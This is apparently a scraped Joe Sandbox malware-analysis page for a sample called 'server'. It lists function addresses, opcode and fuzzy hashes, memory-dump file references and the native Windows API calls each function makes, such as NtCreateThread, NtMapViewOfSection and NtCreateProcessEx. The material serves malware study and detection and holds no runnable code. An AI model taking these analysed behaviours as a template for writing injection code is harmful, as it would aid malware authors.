Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: DirectoryFileQuery
String ID:
API String ID: 3295332484-0
Opcode ID: aa489c70d001287871ed09086ccc638b5d007d76ebab8c9813731f5f86f8a090
Instruction ID: cde5a1f30ecd2a6b62bbe33fb6465ebb8a6528e55ceab80d933f3f03eade89f1
Opcode Fuzzy Hash: aa489c70d001287871ed09086ccc638b5d007d76ebab8c9813731f5f86f8a090
Instruction Fuzzy Hash: FF016BB6201249BF9B10CE8ADCD4DEBBB6CFB8D6A4B444005FB1897211C270AC51C7B0

Function 00A198B0 Relevance: 1.5, APIs: 1, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(?,?,?,?,?,?,?,?,?,?), ref: 00A19900

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 1364e08b0aa50443ab7af7f3ee8eea4d2d70c2781012a4f282745e95a97fa0ce
Instruction ID: 736d5dbeeba6593163ea9f68a43978bf427c4504feeccb4141ec62aeca3edc27
Opcode Fuzzy Hash: 1364e08b0aa50443ab7af7f3ee8eea4d2d70c2781012a4f282745e95a97fa0ce
Instruction Fuzzy Hash: 5A0166B6200259BF9B10DECADCC4DEBBB6CFB8D694B444015BB1997212C230AC51CBB0

Function 00A190D8 Relevance: 1.5, APIs: 1, Instructions: 44filenativeCOMMON

Download Yara Rule

APIs

NtNotifyChangeDirectoryFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00A19120

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: ChangeDirectoryFileNotify
String ID:
API String ID: 1357473996-0
Opcode ID: f2410bbea1fd0bec9ab71db184a33dad65b3e2885eabca7a5c9fd1c806fa8c67
Instruction ID: 0b5190d364a29bdeaa2c4ff2df7561dcd77091494d1604455542753215c06957
Opcode Fuzzy Hash: f2410bbea1fd0bec9ab71db184a33dad65b3e2885eabca7a5c9fd1c806fa8c67
Instruction Fuzzy Hash: E6F0AFB6145249BF9B10DE9ADCC8DFB7B6CFB9D7A0B544005FA5887201C230AD51CBB0

Function 00A195A4 Relevance: 1.5, APIs: 1, Instructions: 44filenativeCOMMON

Download Yara Rule

APIs

NtWriteFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00A195EC

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 333195f0f366f4741d12a3b9efd3f112d6dfb85395c3254af154bbfbb966ad95
Instruction ID: 65f7720b819163f2a6866cfc448ecef3cffe3150fb0a274725ec1b23b064f752
Opcode Fuzzy Hash: 333195f0f366f4741d12a3b9efd3f112d6dfb85395c3254af154bbfbb966ad95
Instruction Fuzzy Hash: 92F079B6201259BF9710DECADCC4DEBBBACFB8D6A4B444015BB1897201C230AD55C7B0

Function 00A18F64 Relevance: 1.5, APIs: 1, Instructions: 44nativeCOMMON

Download Yara Rule

APIs

NtCreateProcessEx.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00A18FAC

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a6f4b07468960df21d1ebee3a29a1283bb1a147ce1183686491804e7216e7359
Instruction ID: 959dac38a9767d518afc0dc6e9fcfd5cf9f95c45aa473eae246476b5db652493
Opcode Fuzzy Hash: a6f4b07468960df21d1ebee3a29a1283bb1a147ce1183686491804e7216e7359
Instruction Fuzzy Hash: 0BF0AFB6600249BFD710CE9ADDC4DEB7B6DFB8D7A4B444405BB1987201C630AD51C7B0

Function 00A191C8 Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON

Download Yara Rule

APIs

NtAccessCheck.NTDLL(?,?,?,?,?,?,?,?), ref: 00A19208

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: AccessCheck
String ID:
API String ID: 3492747997-0
Opcode ID: fe4dabadc239b5d6556cfd1945a7cbe24da7b770a8e04c9ae8b2e0f1a2f3f97f
Instruction ID: 75ebd7e35a228b1d4b2a177752bce1b4faf09b862f54c13d369b280cf6dc2fdd
Opcode Fuzzy Hash: fe4dabadc239b5d6556cfd1945a7cbe24da7b770a8e04c9ae8b2e0f1a2f3f97f
Instruction Fuzzy Hash: CDF067B6104259BF9B10DECADCC8DEBBB6CEB8D6A4B444119BA1887211C270AD50CBB0

Function 00A18EA8 Relevance: 1.5, APIs: 1, Instructions: 40nativethreadCOMMON

Download Yara Rule

APIs

NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 00A18EE8

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 005a560ec35569b9d244c87dffe834aec02cd73cd06e69f103e33fc285314297
Instruction ID: 95863f1c60aa4344f17c6838957131a2cb7555a8f72cf8444026487f5ddd978e
Opcode Fuzzy Hash: 005a560ec35569b9d244c87dffe834aec02cd73cd06e69f103e33fc285314297
Instruction Fuzzy Hash: C4F0D0B6105199BFA710CF96DCC8DF77FACEB9E7A4B444105B60887101C130AC50C7B0

Function 00A18F14 Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON

Download Yara Rule

APIs

NtCreateProcess.NTDLL(?,?,?,?,?,?,?,?), ref: 00A18F54

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b73596ffd29f40ccd532700608e11a96417f6c3fbe183279fc65dc61ae2414c0
Instruction ID: 6c954bdfc214776766d4100d4081e296327bba20e89164e4fc368b91ff7f8bef
Opcode Fuzzy Hash: b73596ffd29f40ccd532700608e11a96417f6c3fbe183279fc65dc61ae2414c0
Instruction Fuzzy Hash: F1F0B7B6200249BF9710CE8ADDC8DEB7BACEB9D7A0B448005BA1887201C674AD51C7B0

Function 00A19716 Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

NtDuplicateObject.NTDLL(?,?,?,?,?,?,?), ref: 00A19750

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: DuplicateObject
String ID:
API String ID: 3677547684-0
Opcode ID: 842b537c289f201d57fc24e413a7f4924c113ed8a5a08c472ae50639051d35f5
Instruction ID: 6f58a5fc3fd33d28c894c42d3051d81073d5bef1db39aabe33ae5e4034c04914
Opcode Fuzzy Hash: 842b537c289f201d57fc24e413a7f4924c113ed8a5a08c472ae50639051d35f5
Instruction Fuzzy Hash: 51F0ACB6204259BFA750CE9AEC88DF77B6CEB897A4B048115FA1887141D271AD40D7B0

Function 00A192EC Relevance: 1.5, APIs: 1, Instructions: 36nativeCOMMON

Download Yara Rule

APIs

NtCreateKey.NTDLL(?,?,?,?,?,?,?), ref: 00A19324

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
